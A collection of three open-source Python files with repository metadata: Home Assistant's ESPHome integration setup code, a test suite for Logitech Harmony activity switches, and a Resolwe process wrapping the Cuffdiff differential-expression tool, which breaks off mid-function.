from homeassistant.helpers.event import async_track_state_change_event
from homeassistant.helpers.service import async_set_service_schema
from homeassistant.helpers.template import Template
from .bluetooth import async_connect_scanner
from .domain_data import DOMAIN, DomainData
# Import config flow so that it's added to the registry
from .entry_data import RuntimeEntryData
CONF_NOISE_PSK = "noise_psk"
_LOGGER = logging.getLogger(__name__)
_R = TypeVar("_R")
async def async_setup_entry( # noqa: C901
hass: HomeAssistant, entry: ConfigEntry
) -> bool:
"""Set up the esphome component."""
host = entry.data[CONF_HOST]
port = entry.data[CONF_PORT]
password = entry.data[CONF_PASSWORD]
noise_psk = entry.data.get(CONF_NOISE_PSK)
device_id: str | None = None
zeroconf_instance = await zeroconf.async_get_instance(hass)
cli = APIClient(
host,
port,
password,
client_info=f"Home Assistant {const.__version__}",
zeroconf_instance=zeroconf_instance,
noise_psk=noise_psk,
)
domain_data = DomainData.get(hass)
entry_data = RuntimeEntryData(
client=cli,
entry_id=entry.entry_id,
store=domain_data.get_or_create_store(hass, entry),
)
domain_data.set_entry_data(entry, entry_data)
async def on_stop(event: Event) -> None:
"""Cleanup the socket client on HA stop."""
await _cleanup_instance(hass, entry)
# Use async_listen instead of async_listen_once so that we don't deregister
# the callback twice when shutting down Home Assistant.
# "Unable to remove unknown listener <function EventBus.async_listen_once.<locals>.onetime_listener>"
entry_data.cleanup_callbacks.append(
hass.bus.async_listen(EVENT_HOMEASSISTANT_STOP, on_stop)
)
@callback
def async_on_service_call(service: HomeassistantServiceCall) -> None:
"""Call service when user automation in ESPHome config is triggered."""
domain, service_name = service.service.split(".", 1)
service_data = service.data
if service.data_template:
try:
data_template = {
key: Template(value) # type: ignore[no-untyped-call]
for key, value in service.data_template.items()
}
template.attach(hass, data_template)
service_data.update(
template.render_complex(data_template, service.variables)
)
except TemplateError as ex:
_LOGGER.error("Error rendering data template for %s: %s", host, ex)
return
if service.is_event:
# ESPHome uses servicecall packet for both events and service calls
# Ensure the user can only send events of form 'esphome.xyz'
if domain != "esphome":
_LOGGER.error(
"Can only generate events under esphome domain! (%s)", host
)
return
# Call native tag scan
if service_name == "tag_scanned" and device_id is not None:
# Importing tag via hass.components in case it is overridden
# in a custom_components (custom_components.tag)
tag = hass.components.tag
tag_id = service_data["tag_id"]
hass.async_create_task(tag.async_scan_tag(tag_id, device_id))
return
hass.bus.async_fire(
service.service,
{
ATTR_DEVICE_ID: device_id,
**service_data,
},
)
else:
hass.async_create_task(
hass.services.async_call(
domain, service_name, service_data, blocking=True
)
)
async def _send_home_assistant_state(
entity_id: str, attribute: str | None, state: State | None
) -> None:
"""Forward Home Assistant states to ESPHome."""
if state is None or (attribute and attribute not in state.attributes):
return
send_state = state.state
if attribute:
attr_val = state.attributes[attribute]
# ESPHome only handles "on"/"off" for boolean values
if isinstance(attr_val, bool):
send_state = "on" if attr_val else "off"
else:
send_state = attr_val
await cli.send_home_assistant_state(entity_id, attribute, str(send_state))
@callback
def async_on_state_subscription(
entity_id: str, attribute: str | None = None
) -> None:
"""Subscribe and forward states for requested entities."""
async def send_home_assistant_state_event(event: Event) -> None:
"""Forward Home Assistant states updates to ESPHome."""
# Only communicate changes to the state or attribute tracked
if event.data.get("new_state") is None or (
event.data.get("old_state") is not None
and "new_state" in event.data
and (
(
not attribute
and event.data["old_state"].state
== event.data["new_state"].state
)
or (
attribute
and attribute in event.data["old_state"].attributes
and attribute in event.data["new_state"].attributes
and event.data["old_state"].attributes[attribute]
== event.data["new_state"].attributes[attribute]
)
)
):
return
await _send_home_assistant_state(
event.data["entity_id"], attribute, event.data.get("new_state")
)
unsub = async_track_state_change_event(
hass, [entity_id], send_home_assistant_state_event
)
entry_data.disconnect_callbacks.append(unsub)
# Send initial state
hass.async_create_task(
_send_home_assistant_state(entity_id, attribute, hass.states.get(entity_id))
)
async def on_connect() -> None:
"""Subscribe to states and list entities on successful API login."""
nonlocal device_id
try:
entry_data.device_info = await cli.device_info()
assert cli.api_version is not None
entry_data.api_version = cli.api_version
entry_data.available = True
if entry_data.device_info.name:
cli.expected_name = entry_data.device_info.name
reconnect_logic.name = entry_data.device_info.name
device_id = _async_setup_device_registry(
hass, entry, entry_data.device_info
)
entry_data.async_update_device_state(hass)
entity_infos, services = await cli.list_entities_services()
await entry_data.async_update_static_infos(hass, entry, entity_infos)
await _setup_services(hass, entry_data, services)
await cli.subscribe_states(entry_data.async_update_state)
await cli.subscribe_service_calls(async_on_service_call)
await cli.subscribe_home_assistant_states(async_on_state_subscription)
if entry_data.device_info.bluetooth_proxy_version:
entry_data.disconnect_callbacks.append(
await async_connect_scanner(hass, entry, cli, entry_data)
)
hass.async_create_task(entry_data.async_save_to_store())
except APIConnectionError as err:
_LOGGER.warning("Error getting initial data for %s: %s", host, err)
# Re-connection logic will trigger after this
await cli.disconnect()
async def on_disconnect() -> None:
"""Run disconnect callbacks on API disconnect."""
name = entry_data.device_info.name if entry_data.device_info else host
_LOGGER.debug("%s: %s disconnected, running disconnected callbacks", name, host)
for disconnect_cb in entry_data.disconnect_callbacks:
disconnect_cb()
entry_data.disconnect_callbacks = []
entry_data.available = False
entry_data.async_update_device_state(hass)
async def on_connect_error(err: Exception) -> None:
"""Start reauth flow if appropriate connect error type."""
if isinstance(err, (RequiresEncryptionAPIError, InvalidEncryptionKeyAPIError)):
entry.async_start_reauth(hass)
if isinstance(err, BadNameAPIError):
_LOGGER.warning(
"Name of device %s changed to %s, potentially due to IP reassignment",
cli.expected_name,
err.received_name,
)
reconnect_logic = ReconnectLogic(
client=cli,
on_connect=on_connect,
on_disconnect=on_disconnect,
zeroconf_instance=zeroconf_instance,
name=host,
on_connect_error=on_connect_error,
)
infos, services = await entry_data.async_load_from_store()
await entry_data.async_update_static_infos(hass, entry, infos)
await _setup_services(hass, entry_data, services)
if entry_data.device_info is not None and entry_data.device_info.name:
cli.expected_name = entry_data.device_info.name
reconnect_logic.name = entry_data.device_info.name
if entry.unique_id is None:
hass.config_entries.async_update_entry(
entry, unique_id=entry_data.device_info.name
)
await reconnect_logic.start()
entry_data.cleanup_callbacks.append(reconnect_logic.stop_callback)
return True
@callback
def _async_setup_device_registry(
hass: HomeAssistant, entry: ConfigEntry, device_info: EsphomeDeviceInfo
) -> str:
"""Set up device registry feature for a particular config entry."""
sw_version = device_info.esphome_version
if device_info.compilation_time:
sw_version += f" ({device_info.compilation_time})"
configuration_url = None
if device_info.webserver_port > 0:
configuration_url = f"http://{entry.data['host']}:{device_info.webserver_port}"
manufacturer = "espressif"
if device_info.manufacturer:
manufacturer = device_info.manufacturer
model = device_info.model
hw_version = None
if device_info.project_name:
project_name = device_info.project_name.split(".")
manufacturer = project_name[0]
model = project_name[1]
hw_version = device_info.project_version
device_registry = dr.async_get(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=entry.entry_id,
configuration_url=configuration_url,
connections={(dr.CONNECTION_NETWORK_MAC, device_info.mac_address)},
name=device_info.name,
manufacturer=manufacturer,
model=model,
sw_version=sw_version,
hw_version=hw_version,
)
return device_entry.id
class ServiceMetadata(NamedTuple):
"""Metadata for services."""
validator: Any
example: str
selector: dict[str, Any]
description: str | None = None
ARG_TYPE_METADATA = {
UserServiceArgType.BOOL: ServiceMetadata(
validator=cv.boolean,
example="False",
selector={"boolean": None},
),
UserServiceArgType.INT: ServiceMetadata(
validator=vol.Coerce(int),
example="42",
selector={"number": {CONF_MODE: "box"}},
),
UserServiceArgType.FLOAT: ServiceMetadata(
validator=vol.Coerce(float),
example="12.3",
selector={"number": {CONF_MODE: "box", "step": 1e-3}},
),
UserServiceArgType.STRING: ServiceMetadata(
validator=cv.string,
example="Example text",
selector={"text": None},
),
UserServiceArgType.BOOL_ARRAY: ServiceMetadata(
validator=[cv.boolean],
description="A list of boolean values.",
example="[True, False]",
selector={"object": {}},
),
UserServiceArgType.INT_ARRAY: ServiceMetadata(
validator=[vol.Coerce(int)],
description="A list of integer values.",
example="[42, 34]",
selector={"object": {}},
),
UserServiceArgType.FLOAT_ARRAY: ServiceMetadata(
validator=[vol.Coerce(float)],
description="A list of floating point numbers.",
example="[ 12.3, 34.5 ]",
selector={"object": {}},
),
UserServiceArgType.STRING_ARRAY: ServiceMetadata(
validator=[cv.string],
description="A list of strings.",
example="['Example text', 'Another example']",
selector={"object": {}},
),
}
async def _register_service(
hass: HomeAssistant, entry_data: RuntimeEntryData, service: UserService
) -> None:
if entry_data.device_info is None:
raise ValueError("Device Info needs to be fetched first")
service_name = f"{entry_data.device_info.name.replace('-', '_')}_{service.name}"
schema = {}
fields = {}
for arg in service.args:
if arg.type not in ARG_TYPE_METADATA:
_LOGGER.error(
"Can't register service %s because %s is of unknown type %s",
service_name,
arg.name,
arg.type,
)
return
metadata = ARG_TYPE_METADATA[arg.type]
schema[vol.Required(arg.name)] = metadata.validator
fields[arg.name] = {
"name": arg.name,
"required": True,
"description": metadata.description,
"example": metadata.example,
"selector": metadata.selector,
}
async def execute_service(call: ServiceCall) -> None:
await entry_data.client.execute_service(service, call.data)
hass.services.async_register(
DOMAIN, service_name, execute_service, vol.Schema(schema)
)
service_desc = {
"description": f"Calls the service {service.name} of the node {entry_data.device_info.name}",
"fields": fields,
}
async_set_service_schema(hass, DOMAIN, service_name, service_desc)
async def _setup_services(
hass: HomeAssistant, entry_data: RuntimeEntryData, services: list[UserService]
) -> None:
if entry_data.device_info is None:
# Can happen if device has never connected or .storage cleared
return
old_services = entry_data.services.copy()
to_unregister = []
to_register = []
for service in services:
if service.key in old_services:
# Already exists
if (matching := old_services.pop(service.key)) != service:
# Need to re-register
to_unregister.append(matching)
to_register.append(service)
else:
# New service
to_register.append(service)
for service in old_services.values():
to_unregister.append(service)
entry_data.services = {serv.key: serv for serv in services}
for service in to_unregister:
service_name = f"{entry_data.device_info.name}_{service.name}"
hass.services.async_remove(DOMAIN, service_name)
for service in to_register:
await _register_service(hass, entry_data, service)
async def _cleanup_instance(
hass: HomeAssistant, entry: ConfigEntry
) -> RuntimeEntryData:
"""Cleanup the esphome client if it exists."""
domain_data = DomainData.get(hass)
data = domain_data.pop_entry_data(entry)
data.available = False
for disconnect_cb in data.disconnect_callbacks:
disconnect_cb()
data.disconnect_callbacks = []
for cleanup_callback in data.cleanup_callbacks:
cleanup_callback()
await data.client.disconnect()
return data
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload an esphome config entry."""
entry_data = await _cleanup_instance(hass, entry)
return await hass.config_entries.async_unload_platforms(
entry, entry_data.loaded_platforms
)
async def async_remove_entry(hass: HomeAssistant, entry: ConfigEntry) -> None:
"""Remove an esphome config entry."""
await DomainData.get(hass).get_or_create_store(hass, entry).async_remove()
_InfoT = TypeVar("_InfoT", bound=EntityInfo)
_EntityT = TypeVar("_EntityT", bound="EsphomeEntity[Any,Any]")
_StateT = TypeVar("_StateT", bound=EntityState)
async def platform_async_setup_entry(
hass: HomeAssistant,
entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
*,
component_key: str,
info_type: type[_InfoT],
entity_type: type[_EntityT],
state_type: type[_StateT],
) -> None:
"""Set up an esphome platform.
This method is in charge of receiving, distributing and storing
info and state updates.
"""
entry_data: RuntimeEntryData = DomainData.get(hass).get_entry_data(entry)
entry_data.info[component_key] = {}
entry_data.old_info[component_key] = {}
entry_data.state.setdefault(state_type, {})
@callback
def async_list_entities(infos: list[EntityInfo]) -> None:
"""Update entities of this platform when entities are listed."""
old_infos = entry_data.info[component_key]
new_infos: dict[int, EntityInfo] = {}
add_entities: list[_EntityT] = []
for info in infos:
if not isinstance(info, info_type):
# Filter out infos that don't belong to this platform.
continue
if info.key in old_infos:
# Update existing entity
old_infos.pop(info.key)
else:
# Create new entity
entity = entity_type(entry_data, component_key, info.key, state_type)
add_entities.append(entity)
new_infos[info.key] = info
# Remove old entities
for info in old_infos.values():
entry_data.async_remove_entity(hass, component_key, info.key)
# First copy the now-old info into the backup object
entry_data.old_info[component_key] = entry_data.info[component_key]
# Then update the actual info
entry_data.info[component_key] = new_infos
# Add entities to Home Assistant
async_add_entities(add_entities)
signal = f"esphome_{entry.entry_id}_on_list"
entry_data.cleanup_callbacks.append(
async_dispatcher_connect(hass, signal, async_list_entities)
)
def esphome_state_property(
func: Callable[[_EntityT], _R]
) -> Callable[[_EntityT], _R | None]:
"""Wrap a state property of an esphome entity.
This checks if the state object in the entity is set, and
prevents writing NAN values to the Home Assistant state machine.
"""
@functools.wraps(func)
def _wrapper(self: _EntityT) -> _R | None:
# pylint: disable-next=protected-access
if not self._has_state:
return None
val = func(self)
if isinstance(val, float) and math.isnan(val):
# Home Assistant doesn't use NAN values in state machine
# (not JSON serializable)
return None
return val
return _wrapper
_EnumT = TypeVar("_EnumT", bound=APIIntEnum)
_ValT = TypeVar("_ValT")
class EsphomeEnumMapper(Generic[_EnumT, _ValT]):
"""Helper class to convert between hass and esphome enum values."""
def __init__(self, mapping: dict[_EnumT, _ValT]) -> None:
"""Construct a EsphomeEnumMapper."""
# Add none mapping
augmented_mapping: dict[_EnumT | None, _ValT | None] = mapping # type: ignore[assignment]
augmented_mapping[None] = None
self._mapping = augmented_mapping
self._inverse: dict[_ValT, _EnumT] = {v: k for k, v in mapping.items()}
@overload
def from_esphome(self, value: _EnumT) -> _ValT:
...
@overload
def from_esphome(self, value: _EnumT | None) -> _ValT | None:
...
def from_esphome(self, value: _EnumT | None) -> _ValT | None:
"""Convert from an esphome int representation to a hass string."""
return self._mapping[value]
def from_hass(self, value: _ValT) -> _EnumT:
"""Convert from a hass string to a esphome int representation."""
return self._inverse[value]
ICON_SCHEMA = vol.Schema(cv.icon)
ENTITY_CATEGORIES: EsphomeEnumMapper[
EsphomeEntityCategory, EntityCategory | None
] = EsphomeEnumMapper(
{
EsphomeEntityCategory.NONE: None,
EsphomeEntityCategory.CONFIG: EntityCategory.CONFIG,
EsphomeEntityCategory.DIAGNOSTIC: EntityCategory.DIAGNOSTIC,
}
)
class EsphomeEntity(Entity, Generic[_InfoT, _StateT]):
"""Define a base esphome entity."""
_attr_should_poll = False
def __init__(
self,
entry_data: RuntimeEntryData,
component_key: str,
key: int,
state_type: type[_StateT],
) -> None:
"""Initialize."""
self._entry_data = entry_data
self._component_key = component_key
self._key = key
self._state_type = state_type
async def async_added_to_hass(self) -> None:
"""Register callbacks."""
self.async_on_remove(
async_dispatcher_connect(
self.hass,
(
f"esphome_{self._entry_id}_remove_"
f"{self._component_key}_{self._key}"
),
functools.partial(self.async_remove, force_remove=True),
)
)
self.async_on_remove(
async_dispatcher_connect(
self.hass,
f"esphome_{self._entry_id}_on_device_update",
self._on_device_update,
)
)
self.async_on_remove(
self._entry_data.async_subscribe_state_update(
self._state_type, self._key, self._on_state_update
)
)
@callback
def _on_state_update(self) -> None:
# Behavior can be changed in child classes
self.async_write_ha_state()
@callback
def _on_device_update(self) -> None:
"""Update the entity state when device info has changed."""
if self._entry_data.available:
# Don't update the HA state yet when the device comes online.
# Only update the HA state when the full state arrives
# through the next entity state packet.
return
self._on_state_update()
@property
def _entry_id(self) -> str:
return self._entry_data.entry_id
@property
def _api_version(self) -> APIVersion:
return self._entry_data.api_version
@property
def _static_info(self) -> _InfoT:
# Check if value is in info database. Use a single lookup.
info = self._entry_data.info[self._component_key].get(self._key)
if info is not None:
return cast(_InfoT, info)
# This entity is in the removal project and has been removed from .info
# already, look in old_info
return cast(_InfoT, self._entry_data.old_info[self._component_key][self._key])
@property
def _device_info(self) -> EsphomeDeviceInfo:
assert self._entry_data.device_info is not None
return self._entry_data.device_info
@property
def _client(self) -> APIClient:
return self._entry_data.client
@property
def _state(self) -> _StateT:
return cast(_StateT, self._entry_data.state[self._state_type][self._key])
@property
def _has_state(self) -> bool:
return self._key in self._entry_data.state[self._state_type]
@property
def available(self) -> bool:
"""Return if the entity is available."""
device = self._device_info
if device.has_deep_sleep:
# During deep sleep the ESP will not be connectable (by design)
# For these cases, show it as available
return True
return self._entry_data.available
@property
def unique_id(self) -> str | None:
"""Return a unique id identifying the entity."""
if not self._static_info.unique_id:
return None
return self._static_info.unique_id
@property
def device_info(self) -> DeviceInfo:
"""Return device registry information for this entity."""
return DeviceInfo(
connections={(dr.CONNECTION_NETWORK_MAC, self._device_info.mac_address)}
)
@property
def name(self) -> str:
"""Return the name of the entity."""
return self._static_info.name
@property
def icon(self) -> str | None:
"""Return the icon."""
if not self._static_info.icon:
return None
return cast(str, ICON_SCHEMA(self._static_info.icon))
@property
def entity_registry_enabled_default(self) -> bool:
"""Return if the entity should be enabled when first added to the entity registry."""
return not self._static_info.disabled_by_default
@property
def entity_category(self) -> EntityCategory | None:
"""Return the category of the entity, if any."""
if not self._static_info.entity_category:
return None
return ENTITY_CATEGORIES.from_esphome(self._static_info.entity_category)
|
{
"content_hash": "4c10a7f485e6d8d73957b254654601d9",
"timestamp": "",
"source": "github",
"line_count": 776,
"max_line_length": 105,
"avg_line_length": 34.49226804123711,
"alnum_prop": 0.6150713591870283,
"repo_name": "mezz64/home-assistant",
"id": "23b6a6550e4889d99e89fa595e7ab8f1e7da864f",
"size": "26766",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/esphome/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "52481895"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
}
|
"""Test the Logitech Harmony Hub activity switches."""
from datetime import timedelta
from homeassistant.components.harmony.const import DOMAIN
from homeassistant.components.switch import (
DOMAIN as SWITCH_DOMAIN,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_HOST,
CONF_NAME,
STATE_OFF,
STATE_ON,
STATE_UNAVAILABLE,
)
from homeassistant.util import utcnow
from .const import ENTITY_PLAY_MUSIC, ENTITY_REMOTE, ENTITY_WATCH_TV, HUB_NAME
from tests.common import MockConfigEntry, async_fire_time_changed
async def test_connection_state_changes(
harmony_client, mock_hc, hass, mock_write_config
):
"""Ensure connection changes are reflected in the switch states."""
entry = MockConfigEntry(
domain=DOMAIN, data={CONF_HOST: "192.0.2.0", CONF_NAME: HUB_NAME}
)
entry.add_to_hass(hass)
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
# mocks start with current activity == Watch TV
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_ON)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_OFF)
harmony_client.mock_disconnection()
await hass.async_block_till_done()
# Entities do not immediately show as unavailable
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_ON)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_OFF)
future_time = utcnow() + timedelta(seconds=10)
async_fire_time_changed(hass, future_time)
await hass.async_block_till_done()
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_UNAVAILABLE)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_UNAVAILABLE)
harmony_client.mock_reconnection()
await hass.async_block_till_done()
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_ON)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_OFF)
harmony_client.mock_disconnection()
harmony_client.mock_reconnection()
future_time = utcnow() + timedelta(seconds=10)
async_fire_time_changed(hass, future_time)
await hass.async_block_till_done()
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_ON)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_OFF)
async def test_switch_toggles(mock_hc, hass, mock_write_config):
"""Ensure calls to the switch modify the harmony state."""
entry = MockConfigEntry(
domain=DOMAIN, data={CONF_HOST: "192.0.2.0", CONF_NAME: HUB_NAME}
)
entry.add_to_hass(hass)
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
# mocks start with current activity == Watch TV
assert hass.states.is_state(ENTITY_REMOTE, STATE_ON)
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_ON)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_OFF)
# turn off watch tv switch
await _toggle_switch_and_wait(hass, SERVICE_TURN_OFF, ENTITY_WATCH_TV)
assert hass.states.is_state(ENTITY_REMOTE, STATE_OFF)
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_OFF)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_OFF)
# turn on play music switch
await _toggle_switch_and_wait(hass, SERVICE_TURN_ON, ENTITY_PLAY_MUSIC)
assert hass.states.is_state(ENTITY_REMOTE, STATE_ON)
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_OFF)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_ON)
# turn on watch tv switch
await _toggle_switch_and_wait(hass, SERVICE_TURN_ON, ENTITY_WATCH_TV)
assert hass.states.is_state(ENTITY_REMOTE, STATE_ON)
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_ON)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_OFF)
async def _toggle_switch_and_wait(hass, service_name, entity):
await hass.services.async_call(
SWITCH_DOMAIN,
service_name,
{ATTR_ENTITY_ID: entity},
blocking=True,
)
await hass.async_block_till_done()
|
{
"content_hash": "7941c5eba754741c3921a753ddd00780",
"timestamp": "",
"source": "github",
"line_count": 112,
"max_line_length": 78,
"avg_line_length": 35.19642857142857,
"alnum_prop": 0.7128361237950279,
"repo_name": "sander76/home-assistant",
"id": "1940c54e1123a5601330939138515264143f7280",
"size": "3942",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "tests/components/harmony/test_switch.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "36548768"
},
{
"name": "Shell",
"bytes": "4910"
}
],
"symlink_target": ""
}
|
"""Run Cuffdiff 2.2."""
import os
from pathlib import Path
from plumbum import TEE
from resolwe.process import (
BooleanField,
Cmd,
DataField,
FileField,
FloatField,
JsonField,
ListField,
Persistence,
Process,
SchedulingClass,
StringField,
)
class Cuffdiff(Process):
"""Run Cuffdiff 2.2 analysis.
Cuffdiff finds significant changes in transcript expression, splicing, and
promoter use. You can use it to find differentially expressed genes and
transcripts, as well as genes that are being differentially regulated at
the transcriptional and post-transcriptional level. See
[here](http://cole-trapnell-lab.github.io/cufflinks/cuffdiff/) and
[here](https://software.broadinstitute.org/cancer/software/genepattern/modules/docs/Cuffdiff/7)
for more information.
"""
slug = "cuffdiff"
name = "Cuffdiff 2.2"
process_type = "data:differentialexpression:cuffdiff"
version = "3.4.0"
category = "Differential Expression"
scheduling_class = SchedulingClass.BATCH
persistence = Persistence.CACHED
requirements = {
"expression-engine": "jinja",
"executor": {
"docker": {"image": "public.ecr.aws/genialis/resolwebio/rnaseq:6.0.0"}
},
"resources": {"cores": 10, "memory": 8192},
}
data_name = "Cuffdiff results"
class Input:
"""Input fields to process Cuffdiff."""
case = ListField(
DataField("cufflinks:cuffquant"),
label="Case samples",
)
control = ListField(
DataField("cufflinks:cuffquant"),
label="Control samples",
)
labels = ListField(
StringField(),
label="Group labels",
description="Define labels for each sample group.",
default=["control", "case"],
)
annotation = DataField(
"annotation",
label="Annotation (GTF/GFF3)",
description="A transcript annotation file produced by "
"cufflinks, cuffcompare, or other tool.",
)
genome = DataField(
"seq:nucleotide",
label="Run bias detection and correction algorithm",
required=False,
description="Provide Cufflinks with a multifasta file "
"(genome file) via this option to instruct it to run a "
"bias detection and correction algorithm which can "
"significantly improve accuracy of transcript abundance "
"estimates.",
)
multi_read_correct = BooleanField(
label="Do initial estimation procedure to more accurately "
"weight reads with multiple genome mappings",
default=False,
)
create_sets = BooleanField(
label="Create gene sets",
description="After calculating differential gene "
"expressions create gene sets for up-regulated genes, "
"down-regulated genes and all genes.",
default=False,
)
gene_logfc = FloatField(
label="Log2 fold change threshold for gene sets",
description="Genes above Log2FC are considered as "
"up-regulated and genes below -Log2FC as down-regulated.",
default=1.0,
hidden="!create_sets",
)
gene_fdr = FloatField(
label="FDR threshold for gene sets",
default=0.05,
hidden="!create_sets",
)
fdr = FloatField(
label="Allowed FDR",
description="The allowed false discovery rate. The default is 0.05.",
default=0.05,
)
library_type = StringField(
label="Library type",
description="In cases where Cufflinks cannot determine the "
"platform and protocol used to generate input reads, you "
"can supply this information manually, which will allow "
"Cufflinks to infer source strand information with certain "
"protocols. The available options are listed below. For "
"paired-end data, we currently only support protocols "
"where reads point towards each other: fr-unstranded - "
"Reads from the left-most end of the fragment (in "
"transcript coordinates) map to the transcript strand and "
"the right-most end maps to the opposite strand; "
"fr-firststrand - Same as above except we enforce the rule "
"that the right-most end of the fragment (in transcript "
"coordinates) is the first sequenced (or only sequenced "
"for single-end reads). Equivalently, it is assumed that "
"only the strand generated during first strand synthesis "
"is sequenced; fr-secondstrand - Same as above except we "
"enforce the rule that the left-most end of the fragment "
"(in transcript coordinates) is the first sequenced (or "
"only sequenced for single-end reads). Equivalently, it is "
"assumed that only the strand generated during second "
"strand synthesis is sequenced.",
default="fr-unstranded",
choices=[
("fr-unstranded", "fr-unstranded"),
("fr-firststrand", "fr-firststrand"),
("fr-secondstrand", "fr-secondstrand"),
],
)
library_normalization = StringField(
label="Library normalization method",
description="You can control how library sizes (i.e. "
"sequencing depths) are normalized in Cufflinks and "
"Cuffdiff. Cuffdiff has several methods that require "
"multiple libraries in order to work. Library "
"normalization methods supported by Cufflinks work on one "
"library at a time.",
default="geometric",
choices=[
("geometric", "geometric"),
("classic-fpkm", "classic-fpkm"),
("quartile", "quartile"),
],
)
dispersion_method = StringField(
label="Dispersion method",
description=" Cuffdiff works by modeling the variance in "
"fragment counts across replicates as a function of the "
"mean fragment count across replicates. Strictly speaking, "
"models a quantitity called dispersion - the variance "
"present in a group of samples beyond what is expected "
"from a simple Poisson model of RNA_Seq. You can control "
"how Cuffdiff constructs its model of dispersion in locus "
"fragment counts. Each condition that has replicates can "
"receive its own model, or Cuffdiff can use a global model "
"for all conditions. All of these policies are identical "
"to those used by DESeq (Anders and Huber, Genome Biology, "
"2010).",
default="pooled",
choices=[
("pooled", "pooled"),
("per-condition", "per-condition"),
("blind", "blind"),
("poisson", "poisson"),
],
)
class Output:
"""Output fields of the process Cuffdiff."""
raw = FileField("Differential expression")
de_json = JsonField(label="Results table (JSON)")
de_file = FileField(label="Results table (file)")
transcript_diff_exp = FileField(
label="Differential expression (transcript level)"
)
tss_group_diff_exp = FileField(
label="Differential expression (primary transcript)"
)
cds_diff_exp = FileField(label="Differential expression (coding sequence)")
cuffdiff_output = FileField(label="Cuffdiff output")
source = StringField(label="Gene ID database")
species = StringField(label="Species")
build = StringField(label="Build")
feature_type = StringField(label="Feature type")
def run(self, inputs, outputs):
"""Run the analysis."""
cuffquants = inputs.case + inputs.control
for c in cuffquants:
if c.output.source != cuffquants[0].output.source:
self.error(
"Input samples are of different Gene ID databases: "
f"{c.output.source} and {cuffquants[0].output.source}."
)
if c.output.species != cuffquants[0].output.species:
self.error(
"Input samples are of different Species: "
f"{c.output.species} and {cuffquants[0].output.species}."
)
if c.output.build != cuffquants[0].output.build:
self.error(
"Input samples are of different Panel types: "
f"{c.output.build} and {cuffquants[0].output.build}."
)
for case in inputs.case:
if case in inputs.control:
self.error(
"Case and Control groups must contain unique "
f"samples. Sample {case.sample_name} is in both Case "
"and Control group."
)
case_paths = ",".join([case.output.cxb.path for case in inputs.case])
control_paths = ",".join(
[control.output.cxb.path for control in inputs.control]
)
labels = ",".join(inputs.labels)
outputs.source = cuffquants[0].output.source
outputs.species = cuffquants[0].output.species
outputs.build = cuffquants[0].output.build
outputs.feature_type = "gene"
self.progress(0.1)
params = [
"-output-dir",
"./",
"-num-threads",
self.requirements.resources.cores,
"-labels",
labels,
"-FDR",
inputs.fdr,
"-library-type",
inputs.library_type,
"-library-norm-method",
inputs.library_normalization,
"-dispersion-method",
inputs.dispersion_method,
"-quiet",
]
if inputs.genome:
params.extend(["-frag-bias-correct", inputs.genome.output.fasta.path])
if inputs.multi_read_correct:
params.append("-multi-read-correct")
return_code, _, _ = Cmd["cuffdiff"][params][
inputs.annotation.output.annot.path, control_paths, case_paths
] & TEE(retcode=None)
if return_code:
self.error("Error while computing differential expression with Cuffdiff.")
self.progress(0.90)
exp_file = "cuffdiff.tab"
os.rename("gene_exp.diff", exp_file)
files_list = [
"cds.*",
"isoforms.*",
"genes.*",
"tss_groups.*",
"read_groups.*",
"promoters.diff",
"splicing.diff",
"cds_exp.diff",
exp_file,
"isoform_exp.diff",
"tss_group_exp.diff",
]
zip_file = "cuffdiff_output.zip"
return_code, _, _ = Cmd["zip"][zip_file][files_list] & TEE(retcode=None)
if return_code:
self.error("Error while compressing Cuffdiff files.")
args = [
exp_file,
"de_data.json",
"de_file.tab.gz",
"--gene_id",
"gene_id",
"--fdr",
"q_value",
"--pvalue",
"p_value",
"--logfc",
"log2(fold_change)",
"--stat",
"test_stat",
]
return_code, _, _ = Cmd["parse_diffexp.py"][args] & TEE(retcode=None)
if return_code:
self.error("Error while parsing DGE results.")
(Cmd["gzip"][exp_file])()
outputs.raw = f"{exp_file}.gz"
outputs.de_json = "de_data.json"
outputs.de_file = "de_file.tab.gz"
outputs.transcript_diff_exp = "isoform_exp.diff"
outputs.cds_diff_exp = "cds_exp.diff"
outputs.tss_group_diff_exp = "tss_group_exp.diff"
outputs.cuffdiff_output = "cuffdiff_output.zip"
if inputs.create_sets:
out_dir = "gene_sets"
gene_set_args = [
"--dge_file",
"de_file.tab.gz",
"--out_dir",
out_dir,
"--analysis_name",
self.name,
"--tool",
"Cuffdiff",
"--logfc",
inputs.gene_logfc,
"--fdr",
inputs.gene_fdr,
]
